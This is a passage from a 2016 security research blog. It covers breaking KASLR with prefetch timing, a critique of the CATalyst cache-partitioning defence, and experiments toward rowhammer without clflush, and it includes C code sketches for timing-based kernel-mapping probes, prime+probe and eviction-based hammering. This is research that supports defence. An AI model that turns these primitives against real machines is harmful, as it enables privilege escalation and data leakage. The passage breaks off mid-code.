[2] Heckman, James J.: "Lessons from the Bell Curve", Journal of Political Economy, Vol. 103, No. 5 (Oct., 1995), pp. 1091-1120
[3] Zelalem Birhanu Aweke, Salessawi Ferede Yitbarek, Rui Qiao, Reetuparna Das, Matthew Hicks, Yossi Oren, Todd Austin:”ANVIL: Software-Based Protection Against Next-Generation Rowhammer Attacks”
[4] Yoongu Kim, R. Daly, J. Kim, C. Fallin, Ji Hye Lee, Donghyuk Lee, C. Wilkerson, K. Lai, and O. Mutlu. Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors. In Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on, pages 361-372, June 2014.
[5] Mark Seaborn and Thomas Dullien. Exploiting the DRAM rowhammer bug to gain kernel privileges. March 2015
[6] D. Gruss, C. Maurice, and S. Mangard.” Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript.” ArXiv e-prints, July 2015.

[7] Gruss, Maurice and Wagner: “Flush+Flush: A Stealthier Last-Level Cache Attack” http://arxiv.org/abs/1511.04594

Saturday, February 20, 2016

Breaking KASLR with micro architecture Part 1


Hack in the box & stuff

Skip to the Introduction if you are here for the tech stuff. I submitted a CFP to Hack In The Box in Amsterdam at the end of May, and the talk has been accepted. So I'll be spending part of my vacation this year presenting some of my research on cache side channel attacks from the last year or so. I'm really excited, because I think I actually have some really nice stuff to present: not only is it technically interesting, but I think it's far more relevant than the common perception in the infosec community suggests. If you have a chance, I think it'll be worthwhile going. Amongst those who are going to present is Jacob Torrey, whose material I covered twice on my blog and who in my opinion really is one of those pushing the boundaries of infosec. Felix Wilhelm is also going, and I currently have his master's thesis on my night table; thus far it is indeed very cool reading.

Preparing a talk obviously takes a lot of time, and since I'm an amateur this is going to cut into the time I can spend on this blog. I have two more posts in the pipeline (including part 2 of this post), but no real idea when I can get them done.

Finally, posting this blog post has been a big dilemma for me. I had the basic idea almost a year ago and I've been putting it off again and again, because it's offensive in nature and posting it is a moral borderline case for me. I decided to go ahead, but with a heavy heart. My heart is also heavy because when I started this blog I wanted to target the ambitious newbie; however, there has been a tendency for my work to become progressively less accessible, and this particular post is probably the least accessible thus far.

Introduction


KASLR means "kernel address space layout randomization". It is a feature of most modern operating systems meant to protect against privilege escalation attacks that use code reuse techniques such as ROP (return oriented programming). The idea is that if an attacker doesn't know where the code is, he cannot set up a ROP chain to reuse it. Therefore a modern operating system loads drivers at different addresses on each boot, and this leaves an attacker in the dark about where the code is located. Code reuse attacks have grown in importance for privilege escalation because of requirements for driver signing and the widespread use of "no-execute" settings on the stack and other data in kernel mode, forcing the attacker to either bypass driver signing to load a driver, attack the page tables, or reuse existing code.

Attackers have typically relied on information leaks in known drivers that give away addresses that can be used to locate code. However, last year I had an idea for how we might use the CPU design itself as our information leak, and that is the topic of this blog post. That we can use CPU design against KASLR is particularly bad news, because CPUs are not subject to updates the way software is, and in the past Intel has not been forthcoming with security fixes in this respect. Relying on the CPU for an attack also means that it generalizes across operating systems: many of the findings I've made here for Windows 7 will carry over to other platforms. On the other hand, these kinds of attacks may be applicable only to a subset of CPUs. I think that all modern Intel CPUs with a 3rd level cache (i3, i5, i7 and Xeons from Sandy Bridge and up) are likely to be affected, and possibly other CPUs as well.

Finally, I'd like to say that these kinds of attacks have been made before, but I'm not aware of any with the same methodology as mine.

Finding drivers

The idea revolves around the prefetch instructions. These instructions allow software to give the prefetcher a hint to load a specific address into a certain cache level because the software will need it shortly. This can significantly improve performance, as the prefetcher runs independently of the CPU core and memory is thus fetched before it is used. There is, however, an interesting thing about the prefetch instructions that caught my eye: they don't cause exceptions (except that they are incompatible with a lock prefix) [2] Intel. Yet they take a virtual address as input and need a physical address to load memory and place it in the cache. Thus they may entirely bypass memory protection mechanisms, which seems relatively plausible because, since they aren't actually returning data, they should not in any way or fashion allow an attacker to read memory he isn't supposed to. Consequently, Intel might have decided that there wasn't a security issue.

My first idea was to use the prefetch instruction in a modified prime+probe or evict+time attack: make a guess about an address in a driver, then use the prefetch instruction to load the cache entry, and use either evict+time or prime+probe to tell whether you actually hit the address. This of course is pretty slow, and there is a lot of memory you'd need to run this on before you'd actually find your way around the kernel address space. I'll get back to this in another post.

The second idea was: what if the prefetch instructions leak information through their execution time? I thought of 3 scenarios:

1)      Prefetch does not leak information (e.g. the DS descriptor has a limit, the prefetcher doesn't do anything for kernel memory when called from user mode, the instruction is designed to be constant time, etc.)
2)      Prefetch is slower on virtual addresses that actually map to a page. One reason could be that telling the prefetcher to load the cache takes time.
3)      Prefetch is slower on addresses that do not map to a page, because searching all page table entries for an address is slower than just searching until you hit something.

Well, first I dug into the descriptor issue mentioned in 1), because that would be a no-go, and I recalled that 32-bit XP actually has a limit on its DS descriptor, making it useless for accessing kernel-mode memory. It seems, though, that this is not the case in 64-bit mode, as section 5.3.1 of [1] Intel clearly says that limits are not checked at run time (I think there are some exceptions for FS/GS). So, time to load up a debugger and write some code. First I loaded Live KD and dumped a map of the drivers using the "lm n t" command. Then I wrote some user-mode code that times the prefetcht2 instruction. I picked prefetcht2 because I assumed that loading into the largest-latency cache was most likely to actually be carried out by the prefetcher and thus most likely to be successful. I then wrote code to time prefetching an address 20 times and pick the lowest timing found. My reasoning is that there is noise in the memory subsystem (hence the multiple accesses, to try to cancel it out), and I use the lowest value because searching for the lower bound tells me more than an average would. Then I picked two addresses to time in this way: one a few thousand pages below the first loaded driver, and one inside the first loaded driver. Finally, I repeated the experiment a thousand times. And voilà: the prefetcht2 instruction is faster on a virtual address that is actually mapped. I speculate that this is because the search through PTEs is aborted early and is thus faster. I think I know how to figure out whether this is true, and I may get back to it in another blog post. So I moved on and wrote a small program that scans a small portion of the kernel address space, tells me whether a page is mapped or not, and compares the output to my module list. It worked beyond any expectation.
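A hedged reconstruction of the probing primitive (my re-implementation of what the text above describes, not the original code): time prefetcht2 on a candidate kernel address 20 times with rdtscp and keep the minimum. A minimum below a calibrated threshold suggests the page is mapped.

#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_prefetch, _mm_mfence */

/* Return the minimum of 20 timings of prefetcht2 on the candidate address.
   On the Sandy Bridge used here, mapped kernel addresses come in around
   85 cycles and unmapped ones around 112; the threshold must be calibrated
   per CPU. */
static uint64_t min_prefetch_cycles(const void *candidate)
{
    uint64_t best = ~0ULL;
    unsigned int aux;
    for (int i = 0; i < 20; i++) {
        _mm_mfence();
        uint64_t start = __rdtscp(&aux);
        _mm_prefetch((const char *)candidate, _MM_HINT_T2);
        uint64_t end = __rdtscp(&aux);
        _mm_mfence();
        if (end - start < best)
            best = end - start;
    }
    return best;
}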

So how fast can I scan? It takes about 112 CLKs for a miss and 85 CLKs for a hit on my wife's Sandy Bridge computer. An approximate value (with 20 timings per address), including code overhead, is that I run around 500k probes per second. With a 64-bit address space it would be impractical to scan the entire address space even at that rate. However, we should first notice that modern operating systems use paging, and thus we only need to probe once per page; a page is usually 4096 bytes. Also, on Windows 7 it appears that the 16 upper address bits are all set for drivers, further reducing the problem. Finally, Windows 7 loads drivers contiguously (on my computer around 100 megabytes of them), so I only have to run through a 48-bit address space in 100-megabyte steps to find where the drivers are hiding. This reduces the problem to a practical 6-second one. Now, I do get a few false positives on this scan: things other than drivers may be located in this space, I may have some tuning problems, and additional probing could further reduce these. But I consistently find the drivers and only a few false positives.

What was a blessing above (that the drivers are clustered into one big chunk of pages) is a curse going forward. The problem is that we do not get the size of the individual drivers and thus are unable to tell which is which for a gadget search. However, I believe we can solve this problem with modified versions of evict+time and prime+probe attacks. That, however, will have to wait for part 2 of this blog post.

Thanks

I need to express my gratitude to Nishat Herath of Qualys for the discussions I had with him on this topic.

Literature

[1] Intel: "Intel® 64 and IA-32 Architectures Software Developer's Manual. Volume 3A: System Programming Guide, Part 1". http://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf
[2] Intel: "Intel® 64 and IA-32 Architectures Software Developer's Manual. Volume 2 (2A, 2B & 2C): Instruction Set Reference, A-Z"


Sunday, February 7, 2016

Comments on CATalyst: the first use of CAT to mitigate Cache Side Channel Attacks

Recently Liu et al. [1] released a very interesting new paper, which will be the topic of this blog post. In my "Rowbuffer side channel attacks" post I speculated that CAT would be interesting as a mitigation for cache side channel attacks. It turns out that I was right about that. I did, however, get some of the details of how CAT works wrong; Yuval Yarom of the University of Adelaide was kind enough to correct me, and that became an errata. This new paper, which Yuval co-authored, shows that CAT could indeed play an important role in defending against cache attacks. They call their method "CATalyst". In this blog post I give an ultra-short and incomplete summary of how CAT and CATalyst work, for context; if you wish to get into the details you really need to read the paper. Though I will be critical of CATalyst in this blog post, I should make it very clear that I consider CATalyst a big step forward towards defense against cache side channel attacks and that I'd much prefer to have CATalyst than nothing at all, which, as far as I can tell, is the current state of cloud computing.

Ultra short summary of how CAT works

Cache Allocation Technology, or CAT, is a feature of some newer Xeons; it is not meant to make it into consumer PCs. Newer means that some Haswells have CAT; I'm not sure how common it is in Broadwell or Skylake. CAT was meant as a performance enhancement tool that allows a supervisor or hypervisor to allocate more L3 cache to performance-critical operations. Essentially, the hypervisor or supervisor assigns a "class of service" (COS for short) to an application via an MSR. There are currently 4 COSes. Each COS is associated with a bitmask that describes which ways of the cache can be evicted under that class of service. Thus any application can have reads, writes and flushes served from any way just as before, but can only evict ways that are compatible with its COS. The intended effect is to shield high-priority applications from competitive eviction by lower-priority applications.

Using CAT to defend against CSC

Since a flush can be served from any way in the cache as always, CAT is incapable of defending against flush+reload and flush+flush. However, those attacks can be thwarted by avoiding shared memory across trust boundaries, and [1] Liu et al. use this to defend against them.

This makes "prime+probe" the most important enemy. Recall that prime+probe works by priming a cache set so that it consists of attacker-only data, then waiting for victim activity, and finally accessing the primed data again; if that access incurs a cache miss, the attacker knows that the victim used the cache set. Because CAT can prohibit evictions in parts of the cache, it is capable of making it impossible to prime those parts and thus making prime+probe impossible there.
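For context, here is a minimal prime+probe sketch for a single cache set (the eviction-set construction and the hit/miss threshold are left out); this is the access pattern that pinning lines with CAT is meant to defeat:

#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp */

/* Prime: fill every way of the target L3 set with attacker-controlled lines.
   ev_set holds one address per way, all mapping to the same cache set. */
static void prime_set(volatile char **ev_set, int ways)
{
    for (int i = 0; i < ways; i++)
        (void)*ev_set[i];
}

/* Probe: re-access the same lines and time it. A duration above a calibrated
   threshold means at least one line was evicted, i.e. the victim touched
   this cache set between prime and probe. */
static uint64_t probe_set(volatile char **ev_set, int ways)
{
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    for (int i = 0; i < ways; i++)
        (void)*ev_set[i];
    uint64_t end = __rdtscp(&aux);
    return end - start;
}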

However, it would be bad karma to just deny eviction as a general rule, because that would come at a huge performance cost: deny eviction and the cache cannot adapt to the ongoing work and becomes inefficient. With 4 COS values it is only possible to partition the cache into 4 pieces. That again is a bad idea, because in the cloud you typically have, say, 16 to 64 simultaneous VMs on one computer. It would only make it more difficult for the attacker to get co-location, by a factor of 4, but not thwart anything.

Liu et al. [1] deal with this problem rather elegantly. They divide the cache in two: a secure partition and an insecure partition. Since the secure partition is shared among all VMs, prime+probe would still be possible there. To deal with this, only as much data can be loaded into the secure partition as can be cached in it at once, and they then make sure that everything in the secure partition is indeed cached. The size of the secure partition is kept small to minimize the performance penalty. Finally, the VMM keeps control of the COS and bitmask to prevent any evictions in the secure partition. Thus everything in the secure partition is pinned in the L3 cache, and accesses to memory in the secure region will never miss the L3 cache. The VMM exports an API to the VMs' operating systems to load and unload pages into this secure partition for applications in the VMs to use. To prevent a DoS attack on this, each VM can only load its share of secure memory.

Implementation is made possible by the fact that a VMM gets called when MSRs are written. Thus it can reserve a COS for itself for loading pages into the secure partition, and prevent VMs from gaining this COS as well as from setting a bitmask that would allow eviction in the secure partition.
The really cool thing about this is that it's the first suggested mitigation so far that both looks ironclad and is feasible on current hardware, without being tied to other micro-architectural details such as the complex addressing function for cache allocation, and at a reasonable performance cost as well.

Another feature of CATalyst is that it makes row buffer side channels quite difficult, as reads are served entirely from the cache and thus do not activate a row in DRAM. It might not be altogether impossible to use row buffer side channels, as the secure partition may share rows with insecure memory, and read/write memory can cause row activations when write operations trigger write-backs for reasons of cache coherency. I don't think this is a real problem though.

Problems with this method


I see, however, three problems with this method:
1)      Modern hardware is required
2)      Changes to VMM, OS and applications are required
3)      The secure partition is small.

Modern hardware
The requirement for modern hardware is a short-term problem. In time, modern hardware will be available in the cloud, and thus it's not really a big issue.

Changes to VMM, OS and applications
As for the second problem, the OS and VMM could probably be changed fairly easily given the current focus on the cloud. In fact, I think the OS changes needed could be implemented by 3rd-party drivers and thus easily made available. Applications pose a much bigger issue, though. Typically a cloud consumer uses multiple applications, each with their own security requirements, and they all need to be updated to support CATalyst. This problem could be overcome, but it is certainly a bigger issue than the first. To my knowledge, security technologies that require changes to a range of applications have historically not fared well in the market place.

The small partition size
The real issue for me is that the secure partition is small. The obvious maximum size is the cache size of the system, shared by all VMs (say 20 megabytes). That, however, would be prohibitively expensive performance-wise, which is why the authors talk about taking only a tenth of that, effectively limiting the secure partition to 4-16 pages per VM. Increasing the size probably carries a (near) exponential performance cost: caching the most used cache line brings more than caching the 20th most used cache line.

The authors argue that this isn't a problem: "A few secure pages are usually sufficient for protecting the security-sensitive code and data since these are usually small". I beg to differ. For a single crypto implementation this is obviously true. The problem is that many VMs will have a number of crypto implementations, and operations are typically threaded. Remote access technologies may very well use a different implementation than the web shop, which again uses a different one than SSH, and so on and so forth, not to mention custom implementations. But security requirements don't limit themselves to crypto. Oren et al. [2] showed us that we can infer mouse movement and implement covert channels with cache side channel attacks. Gruss, Spreitzer & Mangard [3] showed us that we can spy on keyboard input in some circumstances. Why care about crypto if your password leaks? I dare speculate that, using machine learning combined with cache side channel attacks on the non-secure partition, a great many secrets could be leaked from a co-located victim. After all, which information each of us considers sensitive is subjective, and cache side channel attacks apply to a very wide range of data.

Even if each of these things fits individually in the secure partition, bad programming practices, hangs and crashes are likely to, at some point, allow a VM to DoS itself by filling the secure partition and not releasing it appropriately. Not to mention the overhead that would come from frequently loading pages into secure memory. Further, I wouldn’t trust software developers in general to correctly identify security-critical code in the first place.

Literature

[1] Fangfei Liu, Qian Ge, Yuval Yarom, Frank Mckeen, Carlos Rozas, Gernot Heiser, Ruby B. Lee (2016). CATalyst: Defeating Last-Level Cache Side Channel Attacks in Cloud Computing. https://ssrg.nicta.com.au/publications/nictaabstracts/8984.pdf

[2] Yossef Oren, V. P. Kemerlis, Simha Sethumadhavan and Angelos D. Keromytis (2015). “The Spy in the Sandbox - Practical Cache Attacks in Javascript”. arXiv:1502.07373v2


[3] Gruss, Spreitzer & Mangard (2015): “Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches”

Monday, February 1, 2016

Row hammer, java script and MESI

Ramblings

There is no tech info here. If you don't care about my ramblings, skip to the intro. It's been a while since my last blog post. With 22 blog posts of varying quality in my first year of blogging, it was time to see to it that I got around to my other hobbies, and the usual social commitments around silly season allowed me to enjoy life in other ways. Also I finally got myself a new computer, and it takes forever to set up. Most of this post was written while installing operating systems on it, so this blog post is likely the last one written on my wife's Sandy Bridge. From now on I'm on a cheap Broadwell laptop (which, much to my dismay, doesn't row hammer either). The good thing is that my new laptop can be crashed, and I hope to get back to some of the projects that require kernel mode code real soon.

Introduction

I was reading around for another blog post that I’ll get around to soon when I stumbled upon an Intel document that caught my attention. It hinted that a read/write pattern could flush the cache, and probably relatively fast. In other words: row hammer. It seemed like I could do this project in just a few hours, and given how long it had been since I’d posted something, I figured I’d do this first and then return to the project I was reading up on. I actually thought this was going to fail, so the working title was “Fail at Row hammer js 2.0”. There is a tendency that people never publish their failures. But the reality of this stuff is that you fail quite frequently (I do at least), yet you always learn something in the process, and I think it’s a shame that this knowledge generally isn’t shared. I turned out to be wrong about two things. I thought the idea could easily be dismissed, but despite not producing the final proof it looks like the idea has merit. The second thing I was wrong about was how long it’d take me to finish. Most of that time was spent fighting Visual Studio: optimize and it’ll move your instructions around (e.g. memory access, then clflush instead of the other way around, which makes a huge difference); don’t optimize and you’ll have any amount of stack access within your timing section. With just a few hours to spare here and there I was trying again and again to get it to work instead of just going to handwritten asm - something I ended up doing anyway. As usual, since the topic is offensive in nature, I’ll share source code only on request.

Why do we need RowHammer.js 2.0?

The short answer is that we don't. The current rowhammer.js works by figuring out which addresses correspond to a cache set and using that information to build a set of addresses that, when touched, evicts the two addresses required to row hammer. There are currently two ways of doing that: either by assuming large pages, which leak information about addresses and cache sets but are an assumption rarely met in the real world, or by timing memory access with an accurate timer. However, JavaScript is increasingly restricting access to a timer accurate enough to tell a single cache hit from a cache miss. JavaScript does this to prevent spying using cache side channel attacks, but it has a side effect on row hammer: it makes it difficult to figure out which addresses correspond to a cache set. Not impossible though, since unlike for spying it's possible to repeat the experiment until enough signal is available to pick it up even with a low-accuracy timer.
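To make the mechanism concrete, here is a minimal sketch in C of what eviction-based hammering boils down to. It assumes ev1 and ev2 are precomputed eviction sets mapping to the same cache sets as addr1 and addr2 - finding those sets is exactly the hard part discussed above - so treat it as an illustration rather than working rowhammer.js code.

void hammer_without_clflush(volatile char *addr1, volatile char *addr2,
                            volatile char **ev1, volatile char **ev2,
                            int ev_len, long rounds)
{
    char sink = 0;
    for (long r = 0; r < rounds; r++) {
        sink += *addr1 + *addr2;           /* activate the two rows */
        for (int i = 0; i < ev_len; i++)
            sink += *ev1[i] + *ev2[i];     /* touching the eviction sets evicts them again - no clflush needed */
    }
    (void)sink;
}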

Another reason could be that we might be able to work around the current cache-miss performance counter detection of row hammer that has been suggested by myself and Nishat Herath of Qualys. Now, before you attackers out there start to cheer too much: I'm fairly certain that a new detection and mitigation along these lines is feasible.

The rough overview

Take this scenario: Core 1 and Core 2 are both reading the same cache line. Core 1 doesn't read it much and gets it from L3, whereas Core 2 reads it a lot and thus retrieves it from L2. At some point Core 1 decides to write to the cache line. Since the L2 at Core 2 is disconnected from Core 1, this becomes a coherency problem. The two most likely solutions are these:

1) When writing to a cache line used across multiple caches: stop all access to this cache line, write back the modified cache to memory, flush the cache hierarchy and "reload" the memory. There is an Intel document that can be read as suggesting that this is what happens: "The frequent coordination required between processors when cache lines are marked ‘Invalid’ requires cache lines to be written to memory and subsequently loaded."

2) The second solution is a bit simpler. There is no reason to actually flush the L3 to memory and reload - coherency is guaranteed if L1 and L2 are flushed on all cores, since L3 is shared. Thus the scheme could just be: stop all access to the cache line, modify L3, and finally invalidate all lower latency caches (L1 and L2) on all cores.

In scenario 1 the possibility of using this to avoid clflush exists, and this might give us a way to do row hammer without clflush - potentially even in JavaScript. Because this method only requires reading and writing of variables, the only micro-architectural knowledge we'd actually need would be to figure out whether two addresses belong to the same bank, and to have a thread running on two different cores. [1] Seaborn and Dullien (2015) demonstrated that finding two addresses that belong to the same bank can be done by chance alone. It also seems likely that we could get a thread running on another core. Thus, if it worked, we'd eliminate the need for a timer and no special opcodes would be required. In fact there is a good chance that the method could apply to other devices with similar cache implementations.

The cache coherency protocol

I'll spend a tiny bit of time on the cache coherency protocol of modern Intel CPUs. The protocol ensures that multiple caches contain a coherent representation of memory. It is a slightly modified version of the MESI protocol, called MESIF, but the literature is much better on MESI, so if you choose to research this you should start there. The MESIF protocol states that any cache entry is always in one of 5 states: Modified, Exclusive, Shared, Invalid or Forward. The MESI(F) order is not relevant - it just makes the acronym pronounceable. The states are as follows:

Invalid: The cache entry starts out its life as "Invalid", meaning no meaningful data is stored here. It is also the state a cache entry enters when we use clflush.

Exclusive: This state means only one cache contains this cache line. Thus in this state there are by definition no cache coherency issues.

Shared: This state means that the cache line is loaded in two or more caches.

Modified: This state signifies that the cache line is different in the cache than in main memory - thus a memory store operation is required should this cache entry be flushed.

Forward: This is a special case of "Shared". It essentially means that if multiple caches hold a shared copy of a cache line, any read operation should be served from this one.

The protocol then specifies that for a given cache line, only transitions between these states are possible:

      M    E    S    I    F
M     x    x    x    Ok   x
E     x    x    x    Ok   x
S     x    x    Ok   Ok   Ok
I     Ok   Ok   Ok   Ok   Ok
F     x    x    Ok   Ok   x

Of interest here is that if any cache (say L3) has the line in the S state, the cache line cannot be directly modified because there is no valid transition from S to M. It is this feature we hope to utilize.

Another feature of the Intel cache manager is snooping. Any memory request is sent out on the bus so that every core can report back the state of the cache - that is, whether and in what state the appropriate cache line is available in the processor's caches.

Also I need to mention the Request For Ownership (RFO for short) transaction. When you're writing to a cache entry that is either shared or invalid, you use an RFO. The RFO is an exclusive command - that is, no other command executes on the cache hierarchy for the cache line while the RFO is processing. The RFO invalidates all other copies of the cache line in the entire cache hierarchy, thus clearing the way for modifying an entry.
We can now outline the two scenarios again.

Core 1 issues a read. The memory is not in the L3 cache, which means it'll be loaded into a way in the appropriate cache set: either there is already an invalid way in the set (one of the ways is marked as I) or an eviction takes place and one of the ways is marked as I. Then data is loaded from main memory and the way is marked as E(xclusive).

Core 2 now reads the same memory. The cache manager decides for some reason that core 2 needs this cache line a lot and thus wants to fill L2 with this particular cache line. Consequently it finds an empty way (or makes one through eviction) in the appropriate set in L2. Then it loads the data from L3. Now both the L3 and the L2 cache hold a copy (Intel caches are inclusive - what is present in L2 must be in L3 too) and thus both entries now get stamped as S(hared).

Core 1 now places the write operation on the bus. The L3 cache can immediately tell that the line is present and shared. Consequently the L2 must be invalidated. Thus an RFO is sent out on the bus and the L2 cache is invalidated. The question here is what happens next.
Option 1: Modify L3 and set it to Modified.
Option 2: Modify L3, write it back to main memory. Then set the appropriate entry to Exclusive.
Option 3: Modify L3, write it back to main memory. Invalidate L3. Reload from main memory.

For us to use this method for row hammering we'd need either option 2 or 3: since both reading from and writing to main memory activate the row, either one can be used for row hammering.

Empirical data

Unfortunately grey theory is just that. Intel tweaks around with their processors and details may change for better performance. But we do have the option of seeing if we can verify it empirically.

As always when timing things in the memory subsystem there is a lot of noise. There are many sources for this noise, but the bottom line is we need to deal with it. My rough method has been to sample between 200 and 1000 timings, depending on just how much noise I get in my measurements, then remove the 10% slowest times, assuming they were slow due to noise. This is not something that would make my old statistics professors proud, but it’s easy to implement and probably doesn't introduce too much bias anyway. Second, we have a ballpark idea about how long a given memory operation takes. Say an uncached memory operation usually takes more than 100 CLKs on my wife’s Sandy Bridge: if I’m timing uncached operations I assume something went wrong if the time spent was less than 100 CLKs. This approach significantly reduces the noise and actually allows me, by looking at the remaining data, to get an idea about what’s happening while I’m writing the code. Once I’m confident in the code I calculate average and standard deviation and formally test my hypothesis.
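As a minimal sketch only (measure_once is a hypothetical callback doing one timed operation, and the sample count and floor are simply the numbers mentioned above), the filtering could look like this in C:

#include <stdint.h>
#include <stdlib.h>

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Collect 'samples' timings, discard anything below the expected floor and the slowest 10%, return the mean. */
double filtered_mean(uint64_t (*measure_once)(void), int samples, uint64_t floor_clks)
{
    uint64_t *t = malloc(samples * sizeof *t);
    int kept = 0;
    for (int i = 0; i < samples; i++) {
        uint64_t v = measure_once();
        if (v >= floor_clks)            /* below the floor: something went wrong, discard */
            t[kept++] = v;
    }
    qsort(t, kept, sizeof *t, cmp_u64);
    int cut = kept - kept / 10;         /* drop the slowest 10% as noise */
    double sum = 0.0;
    for (int i = 0; i < cut; i++)
        sum += (double)t[i];
    free(t);
    return cut ? sum / cut : 0.0;
}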

So my first step was to get some ballpark figures. Because it’s difficult to benchmark how long an “uncached” memory write takes (it's somewhat undefined), I use memory reads as a proxy for how long it takes to actually access memory. A cached memory access takes around 66 CLKs on average, while its uncached counterpart (using clflush+mfence to make sure it’s not in cache) takes around 200 CLKs. A clflush on an address loaded just prior to that takes some 112 CLKs. Finally I time a write operation (mov [Pointer],1) both when I had previously loaded the address into L3 and when I hadn’t. Both take around 90 CLKs.

This data makes a fair amount of sense. Obviously it’s a lot faster to read from L3 than it is to read from memory. A clflush operation in essence needs to block the cache line in the hierarchy and then actually invalidate the cache entry, and with my fencing we probably need to wait for the process to complete. Consequently we’d expect it to take longer than a cached read, but less than an uncached read that actually has to drop down to memory and fetch stuff.
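For reference, a timed read with and without a preceding flush could be sketched like this in C with MSVC-style intrinsics (a sketch only - the exact fencing I used for the numbers above may differ):

#include <intrin.h>
#include <stdint.h>

/* Time a single read of *p in CLKs; if flush_first is set, the line is flushed out of the cache hierarchy first. */
uint64_t time_read(volatile char *p, int flush_first)
{
    if (flush_first) {
        _mm_clflush((const void *)p);
        _mm_mfence();
    }
    _mm_mfence();
    uint64_t start = __rdtsc();
    char sink = *p;              /* the timed load */
    _mm_mfence();
    uint64_t end = __rdtsc();
    (void)sink;
    return end - start;
}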

Now I code up the scenario sketched above (a rough C sketch follows below the list):
1. Main Thread: Make sure it’s running on core 1. Set affinity and sleep to invoke the scheduler.
2. Main Thread: Access the address of interest (AOI) 6 times, which in the past has given me good results in getting it loaded into L3 and only L3.
3. Main Thread: Start the second thread and wait for it to finish.
4. Second Thread: Make sure it’s running on core 2. As above.
5. Second Thread: Access the AOI 10000 times to load it into L2.
6. Second Thread: Finish.
7. Main Thread: Modify the AOI and time it with RDTSC - mov [AOI],1
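A rough sketch of those steps on Windows might look like the following. It is a sketch under assumptions: core 1 and core 2 here are just logical processors 0 and 1 (which on a hyper-threaded machine may share a physical core), and error handling is omitted.

#include <windows.h>
#include <intrin.h>
#include <stdint.h>
#include <stdio.h>

static volatile char *aoi;                              /* address of interest */

static DWORD WINAPI second_thread(LPVOID arg)
{
    SetThreadAffinityMask(GetCurrentThread(), 1 << 1);  /* step 4: pin to "core 2" */
    Sleep(0);
    char sink = 0;
    for (int i = 0; i < 10000; i++)
        sink += *aoi;                                   /* step 5: pull the line into this core's L2 */
    (void)sink; (void)arg;
    return 0;                                           /* step 6 */
}

int main(void)
{
    static char buffer[4096];
    aoi = buffer;

    SetThreadAffinityMask(GetCurrentThread(), 1 << 0);  /* step 1: pin main thread to "core 1" */
    Sleep(0);

    char sink = 0;
    for (int i = 0; i < 6; i++)
        sink += *aoi;                                   /* step 2: get the AOI into L3 (and hopefully only L3) */

    HANDLE h = CreateThread(NULL, 0, second_thread, NULL, 0, NULL);  /* step 3 */
    WaitForSingleObject(h, INFINITE);
    CloseHandle(h);

    _mm_mfence();                                       /* step 7: the timed modify */
    uint64_t start = __rdtsc();
    *aoi = 1;
    _mm_mfence();
    printf("write took %llu CLKs\n", (unsigned long long)(__rdtsc() - start));
    (void)sink;
    return 0;
}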

And voila: now it mostly takes around 170-210 CLKs to write memory. This tells me that I’m on to something. It’s much slower than a normal write operation, so we can assume that something is going on. It’s also far slower than the clflush from my baseline, which should be a flush of a cache entry in the E(xclusive) state. In fact the time suggests that we are hitting main memory. That it isn’t always between 170-210 CLKs and sometimes far below seems to suggest that from time to time my address of interest gets removed from L2 on core 2 before I actually modify it. Maybe the combination of destroying the second thread and waiting for it to be done is enough for other system activity to evict the AOI from L2.

But we don’t actually have to live with this circumstantial evidence. We might be able to measure whether we actually hit memory. It goes like this: when writing to physical memory, the row you wish to write in is loaded into the row buffer of the RAM. Then it’s modified with the data being written - remember the row buffer is 8 KB whereas a cache line is only 64 bytes. Finally the row buffer is written into the appropriate row. Consequently, if we make sure that another row is in the row buffer (by reading it from physical memory) before modifying the address of interest, we can do a row buffer side channel attack to see if that row was then removed.

Just prior to modifying, I therefore added a function that randomly accesses physical memory in a large buffer 200 times, making it unlikely that the address of interest’s row is in the row buffer. I then modify the address of interest as usual and then access the row of the address of interest. To avoid reusing the AOI’s cache line I make sure to place the AOI on a page boundary and access the memory 2 cache lines further ahead. Thus I have no cache conflicts, but from [5] Seaborn (2015)’s mapping of physical memory I can be sure to access the same row.
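A minimal sketch of that probe could look like the following. The assumptions are loud ones: the AOI sits on a page boundary so that aoi + 128 lands in the same DRAM row but a different cache line (as argued above), that line has not been touched before so it isn't cached, and big is just some hypothetical large buffer used to push other rows through the row buffer.

#include <intrin.h>
#include <stdint.h>
#include <stdlib.h>

/* Returns the CLKs it took to read another cache line in the AOI's row right after modifying the AOI.
   A row-hit time suggests the modify really activated the AOI's row in DRAM. */
uint64_t row_buffer_probe(volatile char *aoi, volatile char *big, size_t big_size)
{
    char sink = 0;
    for (int i = 0; i < 200; i++) {                     /* push other rows into the row buffer */
        size_t off = (((size_t)rand() << 15) ^ rand()) % big_size;
        sink += big[off & ~(size_t)63];
    }

    *aoi = 1;                                           /* the modify we want to learn about */
    _mm_mfence();

    volatile char *same_row = aoi + 2 * 64;             /* same row, different cache line, assumed uncached */
    uint64_t start = __rdtsc();
    sink += *same_row;
    _mm_mfence();
    (void)sink;
    return __rdtsc() - start;
}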

When I read an address from a row that is in the row buffer, as I did for my baseline, I get read times of around 200 CLKs. Interestingly, if I immediately access the same row in the scheme above, it takes around 350 CLKs for the request to finish. This seems to indicate that a required resource is unavailable at that time; I have only unfounded speculation as to what that could be. However, if I execute a loop of a significant amount of dummy instructions (mfence) and then access the memory, I get times around 208 CLKs, which is consistent with the current row being in the row buffer. Thus I think I have a strong case that I actually activate the row in DRAM, which is the ultimate prerequisite for row hammering.

Can we simplify the attack vector?

If you are smarter than I was, you probably already know what I’m hinting at. MESI(F) is a protocol to keep coherency between caches - not cores. The core story might just have been a detour in my thinking. What if we load the address of interest into L2 and then modify it on the same core? We’d have exactly the same effect without the threads. At least with a high number of accesses to make sure that the AOI is elevated to L2, this indeed seems to work, though the latency on modifying drops from 200 to around 150 CLKs.
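The same-core variant is then just the threaded experiment collapsed into one function. A sketch, with the same caveats as before (the 10000 reads are simply the count I used above):

#include <intrin.h>
#include <stdint.h>

/* Elevate the AOI into L2 with many reads on the same core, then time the modify. */
uint64_t share_modify_same_core(volatile char *aoi)
{
    char sink = 0;
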